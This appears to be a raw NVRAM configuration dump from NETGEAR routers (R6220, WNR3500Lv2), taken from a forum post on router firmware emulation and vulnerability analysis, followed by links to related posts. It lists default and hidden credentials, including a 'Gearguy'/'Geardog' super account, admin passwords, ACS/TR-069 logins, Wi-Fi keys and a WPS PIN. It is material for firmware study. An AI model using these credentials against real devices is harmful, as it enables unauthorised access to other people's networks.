U:;0;0@pppoa_username5=Guestddns_wan_num=1voip_line2_ring_valid=disablevoip_line1_pref_fax_codec=1wan_mtu8=1458ifmap_dft=1dhcp_end_ip3=192.168.2.254dhcp_end_ip2=192.168.1.254wan_mode3=dhcpcvoip_pstn_enable=disablefw_response_ping2=0fw_response_ping5=0lan_bipaddr3=192.168.2.255qos_tos_enable=enablewiz_reboot=0atm_mbs4=1200prov_tftp_primary_port=69vlan_map=3,2,1,0atm_pcr7=524288fw_spi2=1sip_line1_reg_expire=1200atm_scr4=524288pstn_relay_enable=enablefw_response_ping8=0pppoa_username2=Guestpppoa_username4=Guestdhcp_start_ip6=192.168.5.2atm_mbs5=1200upgrade_default=0fw_spi3=1wan_fix_dns3=0wan_mtu6=1458atm_pcr5=524288fw_nat7=1voip_line1_anonymous_in=1fw_spi4=1sip_line1_reg_headstart=60telnet_active_status=0fw_spi8=1lan_bipaddr6=192.168.5.255wan_dod4=1pppoa_mtu2=1500group_map=VLAN1,SSID1,SSID2,SSID3,SSID4,5G_SSID1,5G_SSID2,5G_SSID3,5G_SSID4,WAN1:VLAN2,WAN2:VLAN3,WAN3:VLAN4::::pppoe_idle7=0atm_scr2=524288qos_sprio_table_4=0,3!1,4!2,4!3,3!4,2!5,2!6,1!7,1fwpt_df_count=0qos_sprio_table_3=0,3!1,4!2,2!3,1!4,3!5,3!6,3!7,3voip_line2_anonymous_in=1qos_sprio_table_info=1,TOS_PREC,ON,3,HIGH,0,7,8!2,TOS_DSCP,OFF,3,HIGH,0,63,0!3,WiFi_WMM,ON,3,OVERW,0,7,8!4,VLA8qos_sprio_table_1atm_qos8=ubrqos_dft_queue=2dhcp_server_enable3=1pppoa_username6=Guestatm_scr3=524288voip_si_time=0dhcp_start_ip4=192.168.3.2upnp_present=0wan_iptype5=Dynamicdhcp_end_ip6=192.168.5.254pppoa_idle5=0atm_scr7=524288wan_dod3=1lan_netmask4=255.255.255.0dhcp_server_enable7=1pppoe_username=guestaccess_control_mode=0wan_mode7=dhcpcsip_line2_proxy_port=5060vlan_mode=0pppoa_username8=Guestfw_response_ping7=0atm_pcr2=524288prov_tftp_default_port=69wan_mode5=dhcpcwan_dod5=1remote_wan_num=1lan_netmask8=255.255.255.0dhcp_start_ip5=192.168.4.2pppoe_mtu4=1492usb_info_dev65=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev64=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_netmask2=255.255.255.0staWirelessMode=9tm_watermark=0HT_AMSDU=0HT_EXTCHA=1gd_down_task_num=3dhcpPriDns=10.10.10.251dhcpEnabled=1WscModeOption=0Key4Type=0start_in_blankstatenvram_get_buf:=blankl2tp_idletime=0tm_3g_ampm=amlog_fwd=1htpwd_recovery_time=0Password=adminwifi_wsc_uuid_hex=3883309230921883a955000000000000hsdpa_pdp_type=0wan_pptp_mode=0super_username=Gearguygd_up_speed=10NoForwardingBTNBSSID=0start_in_blankstate=1mail_ssl=0WdsEnable=0media_server_enable=0tm_3g_enable=0wan_pptp_ip=10.10.10.254BSSTxop=0;0;94;47WebInit=1HT_HTC=1qos_uplink_rate=512tm_enable=0tm_roundup_volumn=0iptv_br_lan2=0tm_3g_action_internet=0wifi_radius_rekey_secs=3600DisableOLBC=0BSSCwmin=4;4;3;2tm_3g_reset_day=1tm_start_time=0DLSCapable=0tm_reset_day=1CountryRegionABand=7HT_BW=1VLANPriority=0wan_pppoe_pass=pppoe_passwdWscUseUFD=0HT_MIMOPS=3PMKCachePeriod=10detect_hw_link=1wifi_rts_thre1=2347AckPolicy=0;0;0;0APSDCapable=0hsdpa_gui_vis=1dhcpStart=10.10.10.100Key2Type=0detect_retry_interval=30WdsEncrypType=NONEWmmCapable=1HT_MpduDensity=5WscConfMode=0MacFilterEnable=0wifi_ap_mode=0Key3Type=0detect_resume_time=30HT_RDG=1BSSACM=0;0;0;0HSCounter=0gd_enable=0wan_pptp_server=pptp_serverwifi_broadcast_ssid5=1wifi_ssid5=NETGEAR_Guest4iptv_br_wlan1=0HostName=ralinkRADIUS_Acct_Port=1813adslwan_mode_backup=dhcpchsdpa_isp=0apple_server_enable=1CountryRegion=5hsdpa_password=guestgd_refresh_rate=3tm_3g_action_led=0wan_reset_enable_pptp=0APCwmax=6;10;4;3wan_pptp_user=pptp_userAuthMode=OPENnatEnabled=1WscConfStatus=2l2tp_server=10.0.0.138wanConnectionMode=STATICAPCwmin=4;4;3;2DMZEnable=0EncrypType=NONEdetect_method=1wan_l2tp_netmask=255.255.255.0OperationMode=0wifi_dot11_iso4=0wifi_ap_name=R6220HT_OpMode=0NintendoCapable=0wan_secondary_dns=168.95.1.1WirelessEvent=0HideSSID=0tm_mtd_initd=0PortForwardEnable=0lang_user_select=0nat_filter=securitywan_account=R6220IPPortFilterEnable=0tm_3g_start_time=0refresh_times=0htpwd_recovery_enable=0hsdpa_access_num=1hsdpa_username=guestwan_l2tp_user=l2tp_userHT_40MHZ_INTOLERANT=0WscConfigured=0dhcpGateway=10.10.10.254HT_BSSCoexistence=1wifi_dot11_iso3=0TurboRate=0wifi_allow_guest5=0TxBurst=1qos_bw_sel=1wifi_key_len4=0BeaconPeriod=100gd_auto_refresh=0HT_PROTECT=1wifi_auth_type5=3PktAggregate=1hsdpa_autoconn=1SSID1=MT7620_APwan_l2tp_mode=0WscEncrypType=1session_timeout_interval=0PreAuth=0need_not_loginnvram_get_buf:=0WscAuthType=1wifi_psk_pwd1=1234567890idle_timeout_interval=0DtimPeriod=1brs_rus_wizard_used=0TxRate=0igmpEnabled=0iptv_br_lan1=0wifi_psk_pwd=1234567890WscKeyMGMT=WPA-EAPAccessPolicy0=0tm_3g_roundup_volumn=0wifi_frag_thre1=2346HT_STBC=1config_state=blankstatehsdpa_country=0tm_3g_poll_interval=10log_wlan=1AutoChannelSelect=0BSSAifsn=3;7;2;2HT_RxStream=2APACM=0;0;0;0TxPower=100wan_l2tp_pass=l2tp_passwdwan_l2tp_ip=10.10.10.254AccessPolicy1=0HT_TxStream=2WscRegResult=1AccessPolicy3=0tm_action_led=0pptpc_user=Guestdetect_hwlink_failtime=30l2tp_dod=1tm_reset_hour=0WscConfigMethod=138apcli_act_as_wan=1mail_notify=0wps_aplockdown_forceon=0product_name=R6220wifi_def_key5=1enable_guistringtable=1gd_down_speed=0wifi_mac1=00:c0:02:11:22:32wifi_radius_rekey_secs1=3600tm_reset_minute=00tm_3g_limit_by=0wifi_badge_led_enable=1WscActionIndex=9ParentalControl=0tm_3g_watermark=0lltdEnabled=0IEEE8021X=0WPAPSK1=12345678AccessPolicy2=0tm_3g_mtd_inited=0pptpc_idletime=0dhcpSecDns=168.95.1.1Channel=6pptpc_server=10.0.0.138BssidNum=1NoForwarding=0APTxop=0;0;94;47tm_action_internet=0BSSCwmax=10;10;4;3wps_mode1=enabledwps_config_state1=1wifi_button_ctl=0hsdpa_autoreconn=1tm_limit_dir=0wan_pptp_gateway=10.10.10.253wps_device_pin=12345670tm_limit_by=0wifi_coexist_enabled=1wifi_dot11_iso5=0wifi_schedule_on=0HT_AutoBA=1HT_MCS=33wan_primary_dns=10.10.10.251mail_ssl_port=25CSPeriod=6wifi_wsc_uuid_asc=38833092-3092-1883-a955-000000000000find_new_version=0wan_pptp_netmask=255.255.255.0pr_wiz_startingwan=0mt_3g_ant_internal=0en_ipmac_enable=0need_not_login=0wan_conn_method=1tm_3g_reset_hour=00RekeyInterval=3600wifi_super_wifi_enable=0Platform=MT7620iptv_br_lan4=0HT_BAWinSize=64WscSSID=RalinkInitialAPHT_BADecline=0DefaultKeyID=1HT_GI=1wifi_allow_guest12=0wan_reset_enable=0wifi_if_on5=0detect_retry_num=2wifi_ap_assign=dhcpcdhcpMask=255.255.255.0old_wan_mode=dhcpcwifi_key_len5=0qos_rate_unit=Kbpsgd_downmanage_auto=0VLANID=0wan_l2tp_gateway=10.10.10.253wifi_wep_on5=0IEEE80211H=0WirelessMode=9dhcpLease=86400ShortSlot=1wan_pppoe_user=pppoe_userlog_asites=1SecurityMode=0device_has_dongle_plugged=0TxPreamble=0super_password=GeardogDefaultFirewallPolicy=1media_server_name=ReadyDLNAHT_DisallowTKIP=1BasicRate=15RADIUS_Port=1812device_name=R6220WscAKMP=1wan_l2tp_server=l2tp_serverLogin=adminRekeyMethod=DISABLEAPAifsn=3;7;1;1iptv_br_lan3=0fw_service_block=0WscUseUPnP=1BGProtection=0dhcpEnd=10.10.10.200hsdpa_idletime=0stpEnabled=0wifi_ap_dns_assign=dynamicKey1Type=0tm_poll_interval=10VLANEnable=0wan_pptp_pass=pptp_passwdapcli_resetwlan_enable=1HT_LinkAdapt=0RTSThreshold=2347FragThreshold=2346tm_ampm=amWscNewKey=scaptestwps_mode=enabledtm_3g_reset_minute=00wifi_dot11_iso2=0tm_3g_limit_dir=0media_server_scan=1tm_mtd_inited=0tm_limit_time=0tm_limit_volumn=0wla_keyBit=0os_date=Feb 7 2018syslog_localDisplayLevel=3wla_temp_mode=145Mbpsppp0_ip_ext_enable=0pppoa_dod=0wan_dns_sel=0bs_trustedip_temp=192.168.1.0wla_repeater=0wla_wds_pmp_sta=1software_version_bak=1.0pppoe_mru=1492syslog_option=1upnp_advert_period=30wl0_wps_config_state=0fw_rsp_ping=0ver_type=WWpppoa_max_echo_fail=3wla_frag=2346wan0_proto_enable_0=1str_tbl_en=1bs_enable_temp=0traffic_warning_state=0wan_ipaddr=0.0.0.0ppp0_to_bridge=0ppp0_remote_ip=0.0.0.0http_rmport=8443usb_wan_ftp_pasv_port_start=30001cpe_productclass=Netgearfw_dmz_enab=0wla_temp_defaKey=0cpe_dl_surl=-traffic_led_enable=0preferredDns=0.0.0.0wps_lan_led=0wla_channel=0wla_ssidIdx=1wl0_radio=1fw_email_send_all=0wla_region=5Te_test_flag=0upnp_advert_ttl=4cpe_status=normalddns_wildcard=0ppa0_to_bridge=0cpe_cmdkey=-wla_temp_setting_3=0wan_ipconn_name=dhcpsyslog_serverPort=514wan_hwaddr_sel=0cpe_parattr=InternetGatewayDevice.ManagementServer.URL:2:0wla_txPwrPcnt=100country=USAwla_wpaGTKRekey=0wan0_encapMode=0ppa0_static_ip=0ver_check_ftp_password=WNR3500U@local_ip2=0.0.0.0wla_rate=0qos_bw_min_3=1000000upnp_portmap_entry=0wan_netmask=0.0.0.0wla_ssid_bc_3=1wla_temp_ssid_3=NETGEAR-Guest2lanip_changed=0traffic_enable=0wps_timeout_enable=0sel_region=0wla_csScanTimer=0wla_radius_port=1812usb_shareport=21usb_wan_http_enable=0manufacturer_OUI=0014BFsmb_host_name=readysharewla_basicRate=defaultlocal_ip1=0.0.0.0wl_unit=0traffic_volume_ctrl_dir=0ipoa_gateway=0.0.0.0et1macaddr=00:FF:FF:FF:FF:FFlan_stp=1wanipaddr_bak=olddhcp_start=192.168.1.2wla_wds_ptp_sta=1http_rmstartip=0.0.0.0ppa0_idle_timeout=300wla_radius_server=0.0.0.0ipa0_ip_addr=0.0.0.0bpa_debug_level=1atmVcc0_tdid=0wan_proto=dhcpcpe_password=plugfestwla_temp_ssid_4=NETGEAR-Guest3friendly_name=WNR3500Lv2atmTd0_maxBurstSize=0ver_check_ftp_username=anonymousis_default=1lan1_lease=86400nowchoice=0qos_l7_apps=5:3 6:3 3:0 2:0 4:0 1:0traffic_restart_hour=00wl0_preauth=0lan1_netmask=255.255.255.0traffic_restart_day=1wl0_wps_reg=enabledwan0_connId=1cpe_periodicinform_enable=1wl0_hwaddr=00:FF:FF:FF:FF:FFwla_disableWme=0WandataDirIndex=1logo_enable=0potMaxValue=4320wan0_enable=1wan_ipaddr_old=0.0.0.0usb_wan_ftp_port=21potValue=0ppp0_netmask=0.0.0.0cpe_username=plugfestping_NOrepetitions=2ipsrv0_ip_mask=0.0.0.0local_ip7=0.0.0.0lan_upnp_wfa_subc_num=0wl_wps_mode=enabledwla_wep_length=0ipsrv0_ip_addr=0.0.0.0pppoe_ifname=ppp0usb_umount=0log_level=0wla_nProtection=autowla_netReauth=36000ver_check_ftp_svr2=updates1.netgear.comver_check_ftp_svr1=updates1.netgear.comwla_dfsPreIsm=60system_name=WNR3500Lv2wan0_nat_enable=1fwpt_enable=1ppa0_auth_method=0lan1_ipaddr=192.168.2.1wan0_vlan_id=1cpe_dl_start=-lang_check_config_file_name=stringtable.txtwan_unit=0gui_check_enable=1usb_dev_no_change=0wla_auth_type_2=automaticpptp_serv_ip=10.0.0.138fw_bks_block_type=0qos_bw_max_0=128000wla_amsdu=offwlan_acl_enable=0wla_wmeApsd=1pppoa_localip=0.0.0.0rm_access=allfw_sip_enab=1lan1_stp=1pppoa_idletime=300usb_wan_ftp_enable=0wla_acl=DisableatmTd0_sustainedCellRate=0traffic_warning_time=0wla_temp_defaKey_4=0ppa0_ip_ext_enable=0traffic_block_enable=0wps_sta_pin=00000000cpe_bootstrap=0wla_sec_profile_name_3=NETGEAR2usb_ftp_enable=0acs_url2=http://172.19.139:1234usb_http_enable=1ppp0_debug=0acs_username=admin48=fab2wan_lease=86400syslog_status=0wl_macmode=disabledwan_primary=0schedule_daylightadjust=0wla_temp_isolation=0traffic_control_type=0fw_email_pid=-1upgrade_enable=1wiz_pppoe_wait_time=5wla_wds_mode=1wla_wep_length_4=0atmVcc0_dsl_mode=0fw_dmz_ip4=2wla_temp_setting_4=0wla_ssid_3=NETGEAR-Guest2ping_datablocksize=42traffic_restart_min=00wla_auth_type=automaticipoa_ipaddr=0.0.0.0pppoe_session_id=0traffic_restart_ampm=0wl_key=1diagnostic_state=Nonepppoa_ifname=ppp0wl_wps_config_state=0cpe_devname=ADSLsmb_enable=1gui_region=Englishdhcp_mode=manualwsc_pin_disable=0wla_enbl_1=0acs_url_bak=http://10.10.10.10:9999fw_spi_enab=1wps_device_name=WNR3500Lv2local_ip3=0.0.0.0enable_gui_str_tbl=1wla_mode=300Mbpsrouter_disable=0usb_wan_ftp_pasv_port_end=30050wla_protection=autowps_config_method=0x2688wla_defaKey=0usb_disk_max_part=15wps_aplockdown_cap=1pppoa_keepalive=1lang_check_ftp_svr=updates1.netgear.comqos_bw_uplink=256000wps_aplockdown_ageout=31536000boardnum=2200pppoa_echo_interval=30ipsrv0_ip_gateway=0.0.0.0usb_wan_http_port=443acs_provisioncode=-boot_wait=offevent_method=M factorytraffic_IssueWarning_enable=0upnp_duration=3600local_ip9=0.0.0.0ver_check_enable=1wla_ssid_bc_2=1syslog_remoteLogLevel=7wl0_net_reauth=36000wl0_wps_mode=enabledlan1_proto=dhcphttp_lanport=80fwpt_timeout=1200wla_preauth=0local_ip10=0.0.0.0str_tbl_non_en=0cpe_periodicinform_interval=86400str_tbl_non_en_ver=0.0.0.0_0.0.0.0ping_timeout=17000local_ip4=0.0.0.052=384cenable_any_usb_dev=1qos_rule_count=-1wiz_dhcp_wait_time=5ddns_checked=0wps_modelnum=WNR3500Lv2wla_auth_type_4=automaticrequest_download=0acs_password=adminfw_email_email_alert=0wl0_wpa_gtk_rekey=0wla_ssid_4=NETGEAR-Guest3local_ip8=0.0.0.0timer_interval=3600wps_aplockdown=0wla_ssid_bc_4=1acs_provisioncode_bak=-wan0_vccId=0wla_nCtrlsb=nonewla_sec_profile_name_2=NETGEAR1ipa0_ip_gateway=0.0.0.0TR111_num=0potInterval=60pppoe_dod=1ipsrv0_static=0wan_interface_number=1pppoe_localip=0.0.0.0nat_inbound_filtering=1wla_temp_secu_type=Noneppa0_remote_ip=0.0.0.0fw_email_email_enable=0wla_tpcDb=0atmVcc0_qos=1bpa_dod=1run_test=0wla_dtmIntvl=1wps_addER=0lang_check_config_file_dir=stringtablesping_interface=-syslog_serverIP=0.0.0.0supported_languages=Englishpppoe_idletime=300wla_temp_defaKey_3=0ppp0_idle_timeout=300ver_check_config_file=fileinfo.txtpptp_dod=1wla_wme=1ping_host=192.168.1.1wla_temp_region=5syslog_serverPort:=0.0.0.0WAN_Internet_Access=1wla_wmeNoAck=0pppoa_mru=1458cpe_dl_fault=-atmVcc0_encap=LLCwla_secu_type_4=Nonecpe_dl_end=-ppa0_debug=0wan0_igmp_proxy_enable=0lan1_dhcp=0wla_ssid=NETGEARsmb_group_name=Workgroupwla_temp_ssid_2=NETGEAR-Guesttraffic_watermark=0wla_ssid_2=NETGEAR-Guestlan_lease=86400traffic_round_up_volume=0ddns_last_ip=0.0.0.0upnp_DHCPServerConfigurable=1wl0_mode=apwla_temp_profile_name_4=NETGEAR3atmVcc0_enable=1ver_check_ftp_svr3=updates1.netgear.comcpe_url=-ezc_enable=1wl_version=3.90.23.0wla_frameBurst=onping_dscp=0restart_processes=0wla_dfsPostIsm=60pptp_idletime=5wla_antDiv=0ipa0_ip_mask=0.0.0.0cpe_url_bak=-wan0_dns_sel=0wla_wmm_advert_3=1wla_sec_profile_enable=1tftp_serv_ipaddr=192.168.1.2wla_ampdu=onwan0_fw_enable=1wla_temp_profile_name_3=NETGEAR2wla_temp_setting_2=0bs_trustedip=192.168.1.0lan1_gateway=192.168.2.1str_tbl_en_ver=1.0.0.24_2.1.30.1wps_modelname=WNR3500Lv2wla_bcnIntvl=100manufacturer_name=Netgearwla_auth_type_3=automaticwla_lazyWds=0usb_mount_signal=0wla_wep_length_3=0wla_temp_profile_name_2=NETGEAR147=15a9atmVcc0_vci=35wla_wep_length_2=0wla_secu_type_2=Nonewla_maxAssoc=128wla_isolation=0wan0_proto=merwla_afterBurnerEn=offwla_sec_profile_enable_2=0wla_wlanstate=Enablestart_tfmeter=0pppoe_max_echo_fail=3wla_ssid_1=Guestwps_perm_lock=0pppoe_keepalive=1wps_mfstring=NETGEAR, Inc.lan_ifname=br0super_passwd=GeardogatmVcc0_aal=aal5lock_list=-atmVcc0_adminStatus=1brs_lang_check_enable=1bpa_status=0wla_wmm_advert_4=1wla_nMcsidx=-1wla_secu_type_3=Noneezc_version=2lanip_setup_changed=0cpe_periodicinform_time=0wla_temp_wlanstate=1wan_hostname=DGN2200parameter_key=-wla_type=apqos_bw_enable=0acs_url=http://172.19.92.139:1234nat_interface_idx=1wl_wps_reg=enabledwla_temp_ssid=NETGEARalternateDns=0.0.0.0wlan_acl_num=64http_rmenable=0ppp0_dod=1local_ip5=0.0.0.0wla_ssid_bc=1fwpt_count=0ipoa_netmask=0.0.0.0wla_wds_enable=0ppp0_ip_addr=0.0.0.0wan_pppconn_name=PPPoEwps_force_restart=yure_disable=1wla_wmm_advert_2=1wla_secu_type=Nonewla_temp_broadcast=ssid_24G_bcwan_gateway=0.0.0.0wl0_bss_enabled=1ppp0_auth_method=0ppa0_ip_addr=0.0.0.0ipa0_static=1atmVcc0_vpi=8bpa_server=login-serverppa0_netmask=0.0.0.0bpa_idletime=5http_lang=enwla_sec_profile_enable_3=0dhcp_end=192.168.1.254ntp_server=192.5.41.40 192.5.41.41 133.100.9.2http_rmendip=255.255.255.255atmTd0_service=ubrrun_wiz=0syslog_localLogLevel=7wla_broadcast=1local_ip6=0.0.0.0ppp0_static_ip=0enblIgmpSnp=0ntp_update_interval=86400wla_temp_setting=0wan_bpa_minheartbeat=2wla_nReqd=0wps_uuid=0x000102030405060708090A0B0C0D0EBBtr069_enable=0wan_bpa_localport=5050wla_regMode=0wla_temp_channel=0IPConnExtIP_111=-ver_check_stringtable_dat=stringtable.datatmVcc0_multiplex=llcencapswla_phyType=gwla_temp_defaKey_2=049=fe99bs_enable=0atmTd0_peakCellRate=0pppoe_echo_interval=30http_passwd=passwordenblIgmpMode=0wps_aplockdown_count=3wan_ifnames=eth0wps_aplockdown_duration=31536000wla_sec_profile_name_4=NETGEAR3wan_bpa_maxheartbeat=20adsl_setting_map=0x0000007fwan_access_type=DSLatmVcc0_port=0wla_preamble=long赞赏
- [原创]NETGEAR 路由器环境模拟与漏洞分析 706
- [原创]TD路由器环境模拟与漏洞分析 1512
- [原创]TD路由器固件分析 1893
- [原创]TD路由器固件解密 1053
- [原创]DLINK路由器命令注入漏洞从1DAY到0DAY 2376